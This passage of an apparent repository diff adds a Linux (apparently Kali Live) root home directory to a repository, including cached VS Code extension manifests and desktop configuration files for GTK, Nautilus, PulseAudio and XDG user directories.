./syntaxes/rust.tmLanguage.json"},"contributes":{"languages":[{"id":"rust","extensions":[".rs"],"aliases":["Rust","rust"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"rust","path":"./syntaxes/rust.tmLanguage.json","scopeName":"source.rust"}]},"isBuiltin":true,"id":"vscode.rust","extensionFolderPath":"/usr/share/code/resources/app/extensions/rust"},{"name":"scss","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js atom/language-sass grammars/scss.cson ./syntaxes/scss.json"},"contributes":{"languages":[{"id":"scss","aliases":["SCSS","scss"],"extensions":[".scss"],"mimetypes":["text/x-scss","text/scss"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"scss","scopeName":"source.css.scss","path":"./syntaxes/scss.json"}],"problemMatchers":[{"name":"node-sass","label":"Node Sass Compiler","owner":"node-sass","fileLocation":"absolute","pattern":[{"regexp":"^{$"},{"regexp":"\\s*\"status\":\\s\\d+,"},{"regexp":"\\s*\"file\":\\s\"(.*)\",","file":1},{"regexp":"\\s*\"line\":\\s(\\d+),","line":1},{"regexp":"\\s*\"column\":\\s(\\d+),","column":1},{"regexp":"\\s*\"message\":\\s\"(.*)\",","message":1},{"regexp":"\\s*\"formatted\":\\s(.*)"},{"regexp":"^}$"}]}]},"isBuiltin":true,"id":"vscode.scss","extensionFolderPath":"/usr/share/code/resources/app/extensions/scss"},{"name":"shaderlab","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js tgjones/shaders-tmLanguage grammars/shaderlab.json ./syntaxes/shaderlab.json"},"contributes":{"languages":[{"id":"shaderlab","extensions":[".shader"],"aliases":["ShaderLab","shaderlab"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"shaderlab","path":"./syntaxes/shaderlab.json","scopeName":"source.shaderlab"}]},"isBuiltin":true,"id":"vscode.shaderlab","extensionFolderPath":"/usr/share/code/resources/app/extensions/shaderlab"},{"name":"shellscript","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js atom/language-shellscript grammars/shell-unix-bash.cson ./syntaxes/shell-unix-bash.tmLanguage.json"},"contributes":{"languages":[{"id":"shellscript","aliases":["Shell Script","shellscript","bash","sh","zsh"],"extensions":[".sh",".bash",".bashrc",".bash_aliases",".bash_profile",".bash_login",".ebuild",".install",".profile",".bash_logout",".zsh",".zshrc",".zprofile",".zlogin",".zlogout",".zshenv",".zsh-theme"],"filenames":["PKGBUILD"],"firstLine":"^#!.*\\b(bash|zsh|sh|tcsh).*|^#\\s*-\\*-[^*]*mode:\\s*shell-script[^*]*-\\*-","configuration":"./language-configuration.json","mimetypes":["text/x-shellscript"]}],"grammars":[{"language":"shellscript","scopeName":"source.shell","path":"./syntaxes/shell-unix-bash.tmLanguage.json"}]},"isBuiltin":true,"id":"vscode.shellscript","extensionFolderPath":"/usr/share/code/resources/app/extensions/shellscript"},{"name":"sql","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js Microsoft/vscode-mssql syntaxes/SQL.plist ./syntaxes/sql.tmLanguage.json"},"contributes":{"languages":[{"id":"sql","extensions":[".sql",".dsql"],"aliases":["SQL"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"sql","scopeName":"source.sql","path":"./syntaxes/sql.tmLanguage.json"}]},"isBuiltin":true,"id":"vscode.sql","extensionFolderPath":"/usr/share/code/resources/app/extensions/sql"},{"name":"swift","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js freebroccolo/atom-language-swift grammars/swift.cson ./syntaxes/swift.tmLanguage.json"},"contributes":{"languages":[{"id":"swift","aliases":["Swift","swift"],"extensions":[".swift"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"swift","scopeName":"source.swift","path":"./syntaxes/swift.tmLanguage.json"}],"snippets":[{"language":"swift","path":"./snippets/swift.json"}]},"isBuiltin":true,"id":"vscode.swift","extensionFolderPath":"/usr/share/code/resources/app/extensions/swift"},{"name":"theme-abyss","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"contributes":{"themes":[{"label":"Abyss","uiTheme":"vs-dark","path":"./themes/abyss-color-theme.json"}]},"isBuiltin":true,"id":"vscode.theme-abyss","extensionFolderPath":"/usr/share/code/resources/app/extensions/theme-abyss"},{"name":"theme-defaults","displayName":"Default Themes","description":"The default light and dark themes (Plus and Visual Studio)","categories":["Themes"],"version":"0.1.10","publisher":"vscode","engines":{"vscode":"*"},"contributes":{"themes":[{"id":"Default Dark+","label":"Dark+ (default dark)","uiTheme":"vs-dark","path":"./themes/dark_plus.json"},{"id":"Default Light+","label":"Light+ (default light)","uiTheme":"vs","path":"./themes/light_plus.json"},{"id":"Visual Studio Dark","label":"Dark (Visual Studio)","uiTheme":"vs-dark","path":"./themes/dark_vs.json"},{"id":"Visual Studio Light","label":"Light (Visual Studio)","uiTheme":"vs","path":"./themes/light_vs.json"},{"id":"Default High Contrast","label":"High Contrast","uiTheme":"hc-black","path":"./themes/hc_black.json"}],"iconThemes":[{"id":"vs-minimal","label":"Minimal (Visual Studio Code)","path":"./fileicons/vs_minimal-icon-theme.json"}]},"isBuiltin":true,"id":"vscode.theme-defaults","extensionFolderPath":"/usr/share/code/resources/app/extensions/theme-defaults"},{"name":"theme-kimbie-dark","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"contributes":{"themes":[{"label":"Kimbie Dark","uiTheme":"vs-dark","path":"./themes/kimbie-dark-color-theme.json"}]},"isBuiltin":true,"id":"vscode.theme-kimbie-dark","extensionFolderPath":"/usr/share/code/resources/app/extensions/theme-kimbie-dark"},{"name":"theme-monokai","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"contributes":{"themes":[{"label":"Monokai","uiTheme":"vs-dark","path":"./themes/monokai-color-theme.json"}]},"isBuiltin":true,"id":"vscode.theme-monokai","extensionFolderPath":"/usr/share/code/resources/app/extensions/theme-monokai"},{"name":"theme-monokai-dimmed","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"contributes":{"themes":[{"label":"Monokai Dimmed","uiTheme":"vs-dark","path":"./themes/dimmed-monokai-color-theme.json"}]},"isBuiltin":true,"id":"vscode.theme-monokai-dimmed","extensionFolderPath":"/usr/share/code/resources/app/extensions/theme-monokai-dimmed"},{"name":"theme-quietlight","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"contributes":{"themes":[{"label":"Quiet Light","uiTheme":"vs","path":"./themes/quietlight-color-theme.json"}]},"isBuiltin":true,"id":"vscode.theme-quietlight","extensionFolderPath":"/usr/share/code/resources/app/extensions/theme-quietlight"},{"name":"theme-red","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"contributes":{"themes":[{"label":"Red","uiTheme":"vs-dark","path":"./themes/Red-color-theme.json"}]},"isBuiltin":true,"id":"vscode.theme-red","extensionFolderPath":"/usr/share/code/resources/app/extensions/theme-red"},{"name":"vscode-theme-seti","private":true,"version":"0.1.0","description":"A file icon theme made out of the Seti UI file icons","publisher":"vscode","scripts":{"update":"node ./build/update-icon-theme.js"},"engines":{"vscode":"*"},"contributes":{"iconThemes":[{"id":"vs-seti","label":"Seti (Visual Studio Code)","path":"./icons/vs-seti-icon-theme.json"}]},"isBuiltin":true,"id":"vscode.vscode-theme-seti","extensionFolderPath":"/usr/share/code/resources/app/extensions/theme-seti"},{"name":"theme-solarized-dark","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"contributes":{"themes":[{"label":"Solarized Dark","uiTheme":"vs-dark","path":"./themes/solarized-dark-color-theme.json"}]},"isBuiltin":true,"id":"vscode.theme-solarized-dark","extensionFolderPath":"/usr/share/code/resources/app/extensions/theme-solarized-dark"},{"name":"theme-solarized-light","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"contributes":{"themes":[{"label":"Solarized Light","uiTheme":"vs","path":"./themes/solarized-light-color-theme.json"}]},"isBuiltin":true,"id":"vscode.theme-solarized-light","extensionFolderPath":"/usr/share/code/resources/app/extensions/theme-solarized-light"},{"name":"theme-tomorrow-night-blue","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"contributes":{"themes":[{"label":"Tomorrow Night Blue","uiTheme":"vs-dark","path":"./themes/tomorrow-night-blue-theme.json"}]},"isBuiltin":true,"id":"vscode.theme-tomorrow-night-blue","extensionFolderPath":"/usr/share/code/resources/app/extensions/theme-tomorrow-night-blue"},{"name":"typescript","description":"Extension to add Typescript capabilities to VSCode.","displayName":"TypeScript support for VSCode","version":"0.10.1","author":"Microsoft Corporation","license":"MIT","publisher":"vscode","aiKey":"AIF-d9b70cd4-b9f9-4d70-929b-a071c400b217","enableProposedApi":true,"engines":{"vscode":"*"},"dependencies":{"semver":"4.3.6","vscode-extension-telemetry":"0.0.8","vscode-nls":"2.0.1"},"devDependencies":{"@types/node":"8.0.33","@types/semver":"5.4.0"},"scripts":{"vscode:prepublish":"node ../../node_modules/gulp/bin/gulp.js --gulpfile ../../build/gulpfile.extensions.js compile-extension:typescript ./tsconfig.json","update-grammar":"node ./build/update-grammars.js"},"activationEvents":["onLanguage:javascript","onLanguage:javascriptreact","onLanguage:typescript","onLanguage:typescriptreact","onLanguage:jsx-tags","onCommand:typescript.reloadProjects","onCommand:javascript.reloadProjects","onCommand:typescript.selectTypeScriptVersion","onCommand:javascript.goToProjectConfig","onCommand:typescript.goToProjectConfig","onCommand:typescript.openTsServerLog","onCommand:workbench.action.tasks.runTask"],"main":"/usr/share/code/resources/app/extensions/typescript/out/extension","contributes":{"languages":[{"id":"typescript","aliases":["TypeScript","ts","typescript"],"extensions":[".ts"],"configuration":"./language-configuration.json"},{"id":"typescriptreact","aliases":["TypeScript React","tsx"],"extensions":[".tsx"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"typescript","scopeName":"source.ts","path":"./syntaxes/TypeScript.tmLanguage.json"},{"language":"typescriptreact","scopeName":"source.tsx","path":"./syntaxes/TypeScriptReact.tmLanguage.json","embeddedLanguages":{"meta.tag.tsx":"jsx-tags","meta.tag.without-attributes.tsx":"jsx-tags","meta.tag.attributes.tsx":"typescriptreact","meta.embedded.expression.tsx":"typescriptreact"}}],"configuration":{"type":"object","title":"TypeScript","order":20,"properties":{"typescript.tsdk":{"type":["string","null"],"default":null,"description":"Specifies the folder path containing the tsserver and lib*.d.ts files to use.","scope":"window"},"typescript.disableAutomaticTypeAcquisition":{"type":"boolean","default":false,"description":"Disables automatic type acquisition. Requires TypeScript >= 2.0.6.","scope":"window"},"typescript.npm":{"type":["string","null"],"default":null,"description":"Specifies the path to the NPM executable used for Automatic Type Acquisition. Requires TypeScript >= 2.3.4.","isExecutable":true,"scope":"window"},"typescript.check.npmIsInstalled":{"type":"boolean","default":true,"description":"Check if NPM is installed for Automatic Type Acquisition.","scope":"window"},"javascript.referencesCodeLens.enabled":{"type":"boolean","default":false,"description":"Enable/disable references CodeLens in JavaScript files.","scope":"window"},"typescript.referencesCodeLens.enabled":{"type":"boolean","default":false,"description":"Enable/disable references CodeLens in TypeScript files. Requires TypeScript >= 2.0.6.","scope":"window"},"typescript.implementationsCodeLens.enabled":{"type":"boolean","default":false,"description":"Enable/disable implementations CodeLens. Requires TypeScript >= 2.2.0.","scope":"window"},"typescript.tsserver.log":{"type":"string","enum":["off","terse","normal","verbose"],"default":"off","description":"Enables logging of the TS server to a file. This log can be used to diagnose TS Server issues. The log may contain file paths, source code, and other potentially sensitive information from your project.","scope":"window"},"typescript.tsserver.trace":{"type":"string","enum":["off","messages","verbose"],"default":"off","description":"Enables tracing of messages sent to the TS server. This trace can be used to diagnose TS Server issues. The trace may contain file paths, source code, and other potentially sensitive information from your project.","scope":"window"},"typescript.useCodeSnippetsOnMethodSuggest":{"type":"boolean","default":false,"description":"Complete functions with their parameter signature.","scope":"resource"},"typescript.reportStyleChecksAsWarnings":{"type":"boolean","default":true,"description":"Report style checks as warnings","scope":"window"},"typescript.validate.enable":{"type":"boolean","default":true,"description":"Enable/disable TypeScript validation.","scope":"window"},"typescript.format.enable":{"type":"boolean","default":true,"description":"Enable/disable default TypeScript formatter.","scope":"window"},"typescript.format.insertSpaceAfterCommaDelimiter":{"type":"boolean","default":true,"description":"Defines space handling after a comma delimiter.","scope":"resource"},"typescript.format.insertSpaceAfterConstructor":{"type":"boolean","default":false,"description":"Defines space handling after the constructor keyword. Requires TypeScript >= 2.3.0.","scope":"resource"},"typescript.format.insertSpaceAfterSemicolonInForStatements":{"type":"boolean","default":true,"description":" Defines space handling after a semicolon in a for statement.","scope":"resource"},"typescript.format.insertSpaceBeforeAndAfterBinaryOperators":{"type":"boolean","default":true,"description":"Defines space handling after a binary operator.","scope":"resource"},"typescript.format.insertSpaceAfterKeywordsInControlFlowStatements":{"type":"boolean","default":true,"description":"Defines space handling after keywords in a control flow statement.","scope":"resource"},"typescript.format.insertSpaceAfterFunctionKeywordForAnonymousFunctions":{"type":"boolean","default":true,"description":"Defines space handling after function keyword for anonymous functions.","scope":"resource"},"typescript.format.insertSpaceBeforeFunctionParenthesis":{"type":"boolean","default":false,"description":"Defines space handling before function argument parentheses. Requires TypeScript >= 2.1.5.","scope":"resource"},"typescript.format.insertSpaceAfterOpeningAndBeforeClosingNonemptyParenthesis":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing non empty parenthesis.","scope":"resource"},"typescript.format.insertSpaceAfterOpeningAndBeforeClosingNonemptyBrackets":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing non empty brackets.","scope":"resource"},"typescript.format.insertSpaceAfterOpeningAndBeforeClosingNonemptyBraces":{"type":"boolean","default":true,"description":"Defines space handling after opening and before closing non empty braces. Requires TypeScript >= 2.3.0.","scope":"resource"},"typescript.format.insertSpaceAfterOpeningAndBeforeClosingTemplateStringBraces":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing template string braces. Requires TypeScript >= 2.0.6.","scope":"resource"},"typescript.format.insertSpaceAfterOpeningAndBeforeClosingJsxExpressionBraces":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing JSX expression braces. Requires TypeScript >= 2.0.6.","scope":"resource"},"typescript.format.insertSpaceAfterTypeAssertion":{"type":"boolean","default":false,"description":"Defines space handling after type assertions in TypeScript. Requires TypeScript >= 2.4.","scope":"resource"},"typescript.format.placeOpenBraceOnNewLineForFunctions":{"type":"boolean","default":false,"description":"Defines whether an open brace is put onto a new line for functions or not.","scope":"resource"},"typescript.format.placeOpenBraceOnNewLineForControlBlocks":{"type":"boolean","default":false,"description":"Defines whether an open brace is put onto a new line for control blocks or not.","scope":"resource"},"javascript.validate.enable":{"type":"boolean","default":true,"description":"Enable/disable JavaScript validation.","scope":"window"},"javascript.format.enable":{"type":"boolean","default":true,"description":"Enable/disable default JavaScript formatter.","scope":"window"},"javascript.format.insertSpaceAfterCommaDelimiter":{"type":"boolean","default":true,"description":"Defines space handling after a comma delimiter.","scope":"resource"},"javascript.format.insertSpaceAfterConstructor":{"type":"boolean","default":false,"description":"Defines space handling after the constructor keyword. Requires TypeScript >= 2.3.0.","scope":"resource"},"javascript.format.insertSpaceAfterSemicolonInForStatements":{"type":"boolean","default":true,"description":" Defines space handling after a semicolon in a for statement.","scope":"resource"},"javascript.format.insertSpaceBeforeAndAfterBinaryOperators":{"type":"boolean","default":true,"description":"Defines space handling after a binary operator.","scope":"resource"},"javascript.format.insertSpaceAfterKeywordsInControlFlowStatements":{"type":"boolean","default":true,"description":"Defines space handling after keywords in a control flow statement.","scope":"resource"},"javascript.format.insertSpaceAfterFunctionKeywordForAnonymousFunctions":{"type":"boolean","default":true,"description":"Defines space handling after function keyword for anonymous functions.","scope":"resource"},"javascript.format.insertSpaceBeforeFunctionParenthesis":{"type":"boolean","default":false,"description":"Defines space handling before function argument parentheses. Requires TypeScript >= 2.1.5.","scope":"resource"},"javascript.format.insertSpaceAfterOpeningAndBeforeClosingNonemptyParenthesis":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing non empty parenthesis.","scope":"resource"},"javascript.format.insertSpaceAfterOpeningAndBeforeClosingNonemptyBrackets":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing non empty brackets.","scope":"resource"},"javascript.format.insertSpaceAfterOpeningAndBeforeClosingNonemptyBraces":{"type":"boolean","default":true,"description":"Defines space handling after opening and before closing non empty braces. Requires TypeScript >= 2.3.0.","scope":"resource"},"javascript.format.insertSpaceAfterOpeningAndBeforeClosingTemplateStringBraces":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing template string braces. Requires TypeScript >= 2.0.6.","scope":"resource"},"javascript.format.insertSpaceAfterOpeningAndBeforeClosingJsxExpressionBraces":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing JSX expression braces. Requires TypeScript >= 2.0.6.","scope":"resource"},"javascript.format.placeOpenBraceOnNewLineForFunctions":{"type":"boolean","default":false,"description":"Defines whether an open brace is put onto a new line for functions or not.","scope":"resource"},"javascript.format.placeOpenBraceOnNewLineForControlBlocks":{"type":"boolean","default":false,"description":"Defines whether an open brace is put onto a new line for control blocks or not.","scope":"resource"},"jsDocCompletion.enabled":{"type":"boolean","default":true,"description":"Enable/disable auto JSDoc comments","scope":"resource"},"javascript.implicitProjectConfig.checkJs":{"type":"boolean","default":false,"description":"Enable/disable semantic checking of JavaScript files. Existing jsconfig.json or tsconfig.json files override this setting. Requires TypeScript >=2.3.1.","scope":"window"},"javascript.implicitProjectConfig.experimentalDecorators":{"type":"boolean","default":false,"description":"Enable/disable 'experimentalDecorators' for JavaScript files that are not part of a project. Existing jsconfig.json or tsconfig.json files override this setting. Requires TypeScript >=2.3.1.","scope":"window"},"javascript.nameSuggestions":{"type":"boolean","default":true,"description":"Enable/disable including unique names from the file in JavaScript suggestion lists.","scope":"resource"},"typescript.tsc.autoDetect":{"type":"string","default":"on","enum":["on","off","build","watch"],"description":"Controls auto detection of tsc tasks. 'off' disables this feature. 'build' only creates single run compile tasks. 'watch' only creates compile and watch tasks. 'on' creates both build and watch tasks. Default is 'on'.","scope":"window"},"typescript.quickSuggestionsForPaths":{"type":"boolean","default":true,"description":"Enable/disable quick suggestions when typing out an import path.","scope":"resource"},"typescript.autoImportSuggestions.enabled":{"type":"boolean","default":true,"description":"Enable/disable auto import suggestions. Requires TypeScript >=2.6.1","scope":"resource"},"typescript.locale":{"type":["string","null"],"enum":["de","es","en","fr","it","ja","ko","ru","zh-CN","zh-TW",null],"default":null,"description":"Sets the locale used to report TypeScript errors. Requires TypeScript >= 2.6.0. Default of 'null' uses VS Code's locale for TypeScript errors.","scope":"window"}}},"commands":[{"command":"typescript.reloadProjects","title":"Reload Project","category":"TypeScript"},{"command":"javascript.reloadProjects","title":"Reload Project","category":"JavaScript"},{"command":"typescript.selectTypeScriptVersion","title":"Select TypeScript Version","category":"TypeScript"},{"command":"typescript.goToProjectConfig","title":"Go to Project Configuration","category":"TypeScript"},{"command":"javascript.goToProjectConfig","title":"Go to Project Configuration","category":"JavaScript"},{"command":"typescript.openTsServerLog","title":"Open TS Server log","category":"TypeScript"},{"command":"typescript.restartTsServer","title":"Restart TS server","category":"TypeScript"}],"menus":{"commandPalette":[{"command":"typescript.reloadProjects","when":"editorLangId == typescript && typescript.isManagedFile"},{"command":"typescript.reloadProjects","when":"editorLangId == typescriptreact && typescript.isManagedFile"},{"command":"javascript.reloadProjects","when":"editorLangId == javascript && typescript.isManagedFile"},{"command":"javascript.reloadProjects","when":"editorLangId == javascriptreact && typescript.isManagedFile"},{"command":"typescript.goToProjectConfig","when":"editorLangId == typescript && typescript.isManagedFile"},{"command":"typescript.goToProjectConfig","when":"editorLangId == typescriptreact"},{"command":"javascript.goToProjectConfig","when":"editorLangId == javascript && typescript.isManagedFile"},{"command":"javascript.goToProjectConfig","when":"editorLangId == javascriptreact && typescript.isManagedFile"},{"command":"typescript.selectTypeScriptVersion","when":"typescript.isManagedFile"},{"command":"typescript.openTsServerLog","when":"typescript.isManagedFile"},{"command":"typescript.restartTsServer","when":"typescript.isManagedFile"}]},"breakpoints":[{"language":"typescript"},{"language":"typescriptreact"}],"snippets":[{"language":"typescript","path":"./snippets/typescript.json"},{"language":"typescriptreact","path":"./snippets/typescript.json"}],"jsonValidation":[{"fileMatch":"tsconfig.json","url":"http://json.schemastore.org/tsconfig"},{"fileMatch":"tsconfig.json","url":"./schemas/tsconfig.schema.json"},{"fileMatch":"tsconfig.*.json","url":"http://json.schemastore.org/tsconfig"},{"fileMatch":"tsconfig.*.json","url":"./schemas/tsconfig.schema.json"},{"fileMatch":"typings.json","url":"http://json.schemastore.org/typings"}],"taskDefinitions":[{"type":"typescript","required":["tsconfig"],"properties":{"tsconfig":{"type":"string","description":"The tsconfig file that defines the TS build"},"option":{"type":"string"}}}],"problemPatterns":[{"name":"tsc","regexp":"^([^\\s].*)\\((\\d+|\\d+,\\d+|\\d+,\\d+,\\d+,\\d+)\\):\\s+(error|warning|info)\\s+(TS\\d+)\\s*:\\s*(.*)$","file":1,"location":2,"severity":3,"code":4,"message":5}],"problemMatchers":[{"name":"tsc","label":"TypeScript problems","owner":"typescript","applyTo":"closedDocuments","fileLocation":["relative","${cwd}"],"pattern":"$tsc"},{"name":"tsc-watch","label":"TypeScript problems (watch mode)","owner":"typescript","applyTo":"closedDocuments","fileLocation":["relative","${cwd}"],"pattern":"$tsc","background":{"activeOnStart":true,"beginsPattern":{"regexp":"^\\s*(?:message TS6032:|\\d{1,2}:\\d{1,2}:\\d{1,2}(?: AM| PM)? -) File change detected\\. Starting incremental compilation\\.\\.\\."},"endsPattern":{"regexp":"^\\s*(?:message TS6042:|\\d{1,2}:\\d{1,2}:\\d{1,2}(?: AM| PM)? -) Compilation complete\\. Watching for file changes\\."}}}]},"isBuiltin":true,"id":"vscode.typescript","extensionFolderPath":"/usr/share/code/resources/app/extensions/typescript"},{"name":"vb","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js textmate/asp.vb.net.tmbundle Syntaxes/ASP%20VB.net.plist ./syntaxes/asp-vb-net.tmlanguage.json"},"contributes":{"languages":[{"id":"vb","extensions":[".vb",".brs",".vbs",".bas"],"aliases":["Visual Basic","vb"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"vb","scopeName":"source.asp.vb.net","path":"./syntaxes/asp-vb-net.tmlanguage.json"}],"snippets":[{"language":"vb","path":"./snippets/vb.json"}]},"isBuiltin":true,"id":"vscode.vb","extensionFolderPath":"/usr/share/code/resources/app/extensions/vb"},{"name":"xml","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"contributes":{"languages":[{"id":"xml","extensions":[".xml",".xsd",".ascx",".atom",".axml",".bpmn",".config",".cpt",".csl",".csproj",".csproj.user",".dita",".ditamap",".dtd",".dtml",".fsproj",".fxml",".iml",".isml",".jmx",".launch",".menu",".mxml",".nuspec",".opml",".owl",".proj",".props",".pt",".publishsettings",".pubxml",".pubxml.user",".rdf",".rng",".rss",".shproj",".storyboard",".svg",".targets",".tld",".tmx",".vbproj",".vbproj.user",".vcxproj",".vcxproj.filters",".wsdl",".wxi",".wxl",".wxs",".xaml",".xbl",".xib",".xlf",".xliff",".xpdl",".xul",".xoml"],"firstLine":"(\\<\\?xml.*)|(\\ + + + + Current background + + diff --git a/filesystem/root/.config/gtk-2.0/gtkfilechooser.ini b/filesystem/root/.config/gtk-2.0/gtkfilechooser.ini new file mode 100644 index 00000000..c04cab7a --- /dev/null +++ b/filesystem/root/.config/gtk-2.0/gtkfilechooser.ini @@ -0,0 +1,11 @@ +[Filechooser Settings] +LocationMode=path-bar +ShowHidden=false +ShowSizeColumn=true +GeometryX=218 +GeometryY=29 +GeometryWidth=840 +GeometryHeight=508 +SortColumn=name +SortOrder=ascending +StartupMode=recent diff --git a/filesystem/root/.config/mimeapps.list b/filesystem/root/.config/mimeapps.list new file mode 100644 index 00000000..491cae0c --- /dev/null +++ b/filesystem/root/.config/mimeapps.list @@ -0,0 +1,2 @@ +[Added Associations] +application/x-ms-dos-executable=PlayOnLinux.desktop; diff --git a/filesystem/root/.config/nautilus/desktop-metadata b/filesystem/root/.config/nautilus/desktop-metadata new file mode 100644 index 00000000..8a3ec315 --- /dev/null +++ b/filesystem/root/.config/nautilus/desktop-metadata @@ -0,0 +1,29 @@ +[directory] +nautilus-icon-view-keep-aligned=true +nautilus-icon-view-layout-timestamp=1515732753 +nautilus-desktop-icon-size=48 + +[Kali Live.volume] +nautilus-icon-position=56,10 +icon-scale=1 +nautilus-icon-position-timestamp=1512443220 + +[binfmt_misc.volume] +nautilus-icon-position=56,10 +icon-scale=1 +nautilus-icon-position-timestamp=1512530261 + +[47 GB Volume.volume] +nautilus-icon-position=56,126 +icon-scale=1 +nautilus-icon-position-timestamp=1512530604 + +[16.0.4266.1001.volume] +nautilus-icon-position=56,10 +icon-scale=1 +nautilus-icon-position-timestamp=1512700352 + +[15.0.4569.1506.volume] +nautilus-icon-position=56,26 +icon-scale=1 +nautilus-icon-position-timestamp=1512711929 diff --git a/filesystem/root/.config/nautilus/search-metadata b/filesystem/root/.config/nautilus/search-metadata new file mode 100644 index 00000000..f6448d98 --- /dev/null +++ b/filesystem/root/.config/nautilus/search-metadata @@ -0,0 +1,3 @@ +[directory] +nautilus-list-view-sort-column=search_relevance +nautilus-list-view-sort-reversed=true diff --git a/filesystem/root/.config/pulse/52617a56364e410886161e8afa2d9ff9-card-database.tdb b/filesystem/root/.config/pulse/52617a56364e410886161e8afa2d9ff9-card-database.tdb new file mode 100644 index 00000000..897af24e Binary files /dev/null and b/filesystem/root/.config/pulse/52617a56364e410886161e8afa2d9ff9-card-database.tdb differ diff --git a/filesystem/root/.config/pulse/52617a56364e410886161e8afa2d9ff9-default-sink b/filesystem/root/.config/pulse/52617a56364e410886161e8afa2d9ff9-default-sink new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/filesystem/root/.config/pulse/52617a56364e410886161e8afa2d9ff9-default-sink @@ -0,0 +1 @@ + diff --git a/filesystem/root/.config/pulse/52617a56364e410886161e8afa2d9ff9-default-source b/filesystem/root/.config/pulse/52617a56364e410886161e8afa2d9ff9-default-source new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/filesystem/root/.config/pulse/52617a56364e410886161e8afa2d9ff9-default-source @@ -0,0 +1 @@ + diff --git a/filesystem/root/.config/pulse/52617a56364e410886161e8afa2d9ff9-device-volumes.tdb b/filesystem/root/.config/pulse/52617a56364e410886161e8afa2d9ff9-device-volumes.tdb new file mode 100644 index 00000000..3a79b86c Binary files /dev/null and b/filesystem/root/.config/pulse/52617a56364e410886161e8afa2d9ff9-device-volumes.tdb differ diff --git a/filesystem/root/.config/pulse/52617a56364e410886161e8afa2d9ff9-stream-volumes.tdb b/filesystem/root/.config/pulse/52617a56364e410886161e8afa2d9ff9-stream-volumes.tdb new file mode 100644 index 00000000..9cfdae27 Binary files /dev/null and b/filesystem/root/.config/pulse/52617a56364e410886161e8afa2d9ff9-stream-volumes.tdb differ diff --git a/filesystem/root/.config/pulse/cookie b/filesystem/root/.config/pulse/cookie new file mode 100644 index 00000000..be87c346 Binary files /dev/null and b/filesystem/root/.config/pulse/cookie differ diff --git a/filesystem/root/.config/systemd/user/default.target.wants/pulseaudio.service b/filesystem/root/.config/systemd/user/default.target.wants/pulseaudio.service new file mode 120000 index 00000000..bfa2c6ca --- /dev/null +++ b/filesystem/root/.config/systemd/user/default.target.wants/pulseaudio.service @@ -0,0 +1 @@ +/usr/lib/systemd/user/pulseaudio.service \ No newline at end of file diff --git a/filesystem/root/.config/systemd/user/sockets.target.wants/pulseaudio.socket b/filesystem/root/.config/systemd/user/sockets.target.wants/pulseaudio.socket new file mode 120000 index 00000000..b1665239 --- /dev/null +++ b/filesystem/root/.config/systemd/user/sockets.target.wants/pulseaudio.socket @@ -0,0 +1 @@ +/usr/lib/systemd/user/pulseaudio.socket \ No newline at end of file diff --git a/filesystem/root/.config/user-dirs.dirs b/filesystem/root/.config/user-dirs.dirs new file mode 100644 index 00000000..0d19da4e --- /dev/null +++ b/filesystem/root/.config/user-dirs.dirs @@ -0,0 +1,15 @@ +# This file is written by xdg-user-dirs-update +# If you want to change or add directories, just edit the line you're +# interested in. All local changes will be retained on the next run +# Format is XDG_xxx_DIR="$HOME/yyy", where yyy is a shell-escaped +# homedir-relative path, or XDG_xxx_DIR="/yyy", where /yyy is an +# absolute path. No other format is supported. +# +XDG_DESKTOP_DIR="$HOME/Desktop" +XDG_DOWNLOAD_DIR="$HOME/Downloads" +XDG_TEMPLATES_DIR="$HOME/Templates" +XDG_PUBLICSHARE_DIR="$HOME/Public" +XDG_DOCUMENTS_DIR="$HOME/Documents" +XDG_MUSIC_DIR="$HOME/Music" +XDG_PICTURES_DIR="$HOME/Pictures" +XDG_VIDEOS_DIR="$HOME/Videos" diff --git a/filesystem/root/.config/user-dirs.locale b/filesystem/root/.config/user-dirs.locale new file mode 100644 index 00000000..3e0b4191 --- /dev/null +++ b/filesystem/root/.config/user-dirs.locale @@ -0,0 +1 @@ +en_US \ No newline at end of file diff --git a/filesystem/root/Desktop/.blankfile b/filesystem/root/Desktop/.blankfile new file mode 100644 index 00000000..e69de29b diff --git a/filesystem/root/Documents/.blankfile b/filesystem/root/Documents/.blankfile new file mode 100644 index 00000000..e69de29b diff --git a/filesystem/root/Downloads/.blankfile b/filesystem/root/Downloads/.blankfile new file mode 100644 index 00000000..e69de29b diff --git a/filesystem/root/Pictures/Wallpapers/1489388.jpg b/filesystem/root/Pictures/Wallpapers/1489388.jpg new file mode 100755 index 